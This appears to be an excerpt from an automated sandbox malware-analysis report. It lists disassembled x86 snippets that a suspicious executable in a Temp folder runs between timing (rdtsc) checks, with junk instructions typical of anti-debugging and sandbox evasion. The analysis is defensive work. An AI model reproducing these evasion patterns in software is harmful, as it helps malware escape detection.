Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 10F4635 second address: 10F4669 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F2468CF6A3Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b mov si, cx 0x0000000e mov di, si 0x00000011 lea ebx, dword ptr [ebp+12458364h] 0x00000017 movzx edi, si 0x0000001a xchg eax, ebx 0x0000001b pushad 0x0000001c pushad 0x0000001d jne 00007F2468CF6A36h 0x00000023 jnp 00007F2468CF6A36h 0x00000029 popad 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d pop eax 0x0000002e rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 10F4669 second address: 10F467A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jl 00007F2468994E9Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 10F484B second address: 10F484F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 10F484F second address: 10F4853 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 10F487D second address: 10F4883 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 10F4883 second address: 10F48B9 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F2468994E98h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jc 00007F2468994E9Eh 0x00000011 jne 00007F2468994E98h 0x00000017 pushad 0x00000018 popad 0x00000019 nop 0x0000001a mov edi, 41A576A5h 0x0000001f push 00000000h 0x00000021 mov esi, 1D530DA0h 0x00000026 push 35E052F4h 0x0000002b pushad 0x0000002c push eax 0x0000002d push edx 0x0000002e jne 00007F2468994E96h 0x00000034 rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 10F48B9 second address: 10F4933 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F2468CF6A36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b jmp 00007F2468CF6A40h 0x00000010 pop esi 0x00000011 popad 0x00000012 xor dword ptr [esp], 35E05274h 0x00000019 push 00000000h 0x0000001b push edi 0x0000001c call 00007F2468CF6A38h 0x00000021 pop edi 0x00000022 mov dword ptr [esp+04h], edi 0x00000026 add dword ptr [esp+04h], 00000019h 0x0000002e inc edi 0x0000002f push edi 0x00000030 ret 0x00000031 pop edi 0x00000032 ret 0x00000033 stc 0x00000034 mov ecx, dword ptr [ebp+122D365Dh] 0x0000003a push 00000003h 0x0000003c jl 00007F2468CF6A3Ch 0x00000042 or esi, dword ptr [ebp+122D33E9h] 0x00000048 push 00000000h 0x0000004a mov edx, dword ptr [ebp+122D1BDAh] 0x00000050 push 00000003h 0x00000052 mov edi, 6D15D702h 0x00000057 push 97303CECh 0x0000005c push eax 0x0000005d push edx 0x0000005e pushad 0x0000005f ja 00007F2468CF6A36h 0x00000065 pushad 0x00000066 popad 0x00000067 popad 0x00000068 rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 10F4933 second address: 10F493D instructions: 0x00000000 rdtsc 0x00000002 js 00007F2468994E9Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 10F493D second address: 10F4981 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 xor dword ptr [esp], 57303CECh 0x0000000d call 00007F2468CF6A3Bh 0x00000012 jns 00007F2468CF6A37h 0x00000018 stc 0x00000019 pop edi 0x0000001a lea ebx, dword ptr [ebp+12458378h] 0x00000020 jmp 00007F2468CF6A48h 0x00000025 push eax 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 push ebx 0x0000002a pop ebx 0x0000002b rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 111240B second address: 1112413 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 1112578 second address: 1112584 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 11126E6 second address: 11126FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2468994EA0h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 11126FB second address: 1112711 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2468CF6A3Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 1112711 second address: 111272D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007F2468994EA4h 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 111272D second address: 1112744 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F2468CF6A36h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c pop eax 0x0000000d js 00007F2468CF6A36h 0x00000013 popad 0x00000014 push edi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 1112876 second address: 111287A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 111287A second address: 1112880 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 1112B0E second address: 1112B2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F2468994EA2h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 1112C7A second address: 1112C7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 1112C7E second address: 1112C9C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007F2468994E96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007F2468994E96h 0x00000014 jmp 00007F2468994E9Ah 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 1112C9C second address: 1112CA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 1112CA0 second address: 1112CA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 1112DFB second address: 1112E04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 1112E04 second address: 1112E0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 1112E0A second address: 1112E24 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F2468CF6A36h 0x00000008 jmp 00007F2468CF6A3Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 1113108 second address: 111312F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F2468994E9Dh 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F2468994E9Eh 0x00000010 jp 00007F2468994E96h 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 111312F second address: 1113133 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 1113133 second address: 111314B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jo 00007F2468994EAEh 0x0000000e push eax 0x0000000f push edx 0x00000010 jl 00007F2468994E96h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 111314B second address: 111314F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 1113501 second address: 1113528 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2468994E9Ch 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F2468994E9Eh 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 1113528 second address: 111355F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2468CF6A45h 0x00000007 jg 00007F2468CF6A3Eh 0x0000000d jnp 00007F2468CF6A36h 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a pushad 0x0000001b popad 0x0000001c jnc 00007F2468CF6A36h 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 111355F second address: 1113565 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 1113565 second address: 111356A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 111356A second address: 1113572 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 1113B40 second address: 1113B46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 1113CAB second address: 1113CB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 1113F76 second address: 1113FC4 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F2468CF6A36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F2468CF6A45h 0x0000000f jmp 00007F2468CF6A48h 0x00000014 popad 0x00000015 jne 00007F2468CF6A5Fh 0x0000001b jne 00007F2468CF6A3Ch 0x00000021 jnc 00007F2468CF6A36h 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a pop eax 0x0000002b rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 1113FC4 second address: 1113FD7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2468994E9Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 1117BA7 second address: 1117BCD instructions: 0x00000000 rdtsc 0x00000002 jg 00007F2468CF6A4Bh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 1118180 second address: 1118184 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 11169F0 second address: 1116A22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2468CF6A3Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F2468CF6A3Fh 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F2468CF6A3Dh 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 1117186 second address: 111718A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 111718A second address: 11171AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2468CF6A3Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007F2468CF6A3Ch 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 1118266 second address: 111826C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 111826C second address: 11182A9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b jmp 00007F2468CF6A45h 0x00000010 pop ecx 0x00000011 jmp 00007F2468CF6A3Eh 0x00000016 popad 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b push ebx 0x0000001c jg 00007F2468CF6A3Ch 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 11182A9 second address: 11182BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 mov eax, dword ptr [eax] 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a jng 00007F2468994E96h 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 11182BA second address: 11182C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 11182C0 second address: 11182D2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f push edi 0x00000010 pop edi 0x00000011 pop ebx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 1118420 second address: 1118425 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 1118425 second address: 111842A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 111842A second address: 111843C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jno 00007F2468CF6A38h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 111F4AE second address: 111F4B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 111F5FA second address: 111F629 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F2468CF6A41h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 jmp 00007F2468CF6A43h 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 112120B second address: 112120F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 1121481 second address: 1121485 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 11219BC second address: 11219C2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 1121C02 second address: 1121C0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F2468CF6A36h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 1121EF1 second address: 1121EF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 1121FBC second address: 1121FC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 1122527 second address: 112252E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 1123EE2 second address: 1123EF2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jnc 00007F2468CF6A36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 1123EF2 second address: 1123EF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 1122D54 second address: 1122D7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop esi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007F2468CF6A4Fh 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 1122D7C second address: 1122D81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 11254B8 second address: 11254BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 11254BC second address: 112551E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 sbb esi, 095CBC00h 0x0000000d push 00000000h 0x0000000f mov esi, dword ptr [ebp+122D33E1h] 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push esi 0x0000001a call 00007F2468994E98h 0x0000001f pop esi 0x00000020 mov dword ptr [esp+04h], esi 0x00000024 add dword ptr [esp+04h], 0000001Bh 0x0000002c inc esi 0x0000002d push esi 0x0000002e ret 0x0000002f pop esi 0x00000030 ret 0x00000031 je 00007F2468994EA2h 0x00000037 jmp 00007F2468994E9Ch 0x0000003c xchg eax, ebx 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007F2468994EA3h 0x00000044 rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 112551E second address: 112555E instructions: 0x00000000 rdtsc 0x00000002 jc 00007F2468CF6A3Ch 0x00000008 jg 00007F2468CF6A36h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 je 00007F2468CF6A48h 0x00000018 jmp 00007F2468CF6A42h 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F2468CF6A44h 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 1126115 second address: 112611A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 1126BBA second address: 1126BBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 1126BBF second address: 1126BD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2468994E9Fh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 1126BD2 second address: 1126C36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov esi, dword ptr [ebp+122D3605h] 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ecx 0x00000018 call 00007F2468CF6A38h 0x0000001d pop ecx 0x0000001e mov dword ptr [esp+04h], ecx 0x00000022 add dword ptr [esp+04h], 00000014h 0x0000002a inc ecx 0x0000002b push ecx 0x0000002c ret 0x0000002d pop ecx 0x0000002e ret 0x0000002f mov si, cx 0x00000032 xchg eax, ebx 0x00000033 pushad 0x00000034 jmp 00007F2468CF6A45h 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F2468CF6A47h 0x00000040 rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 1126C36 second address: 1126C3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
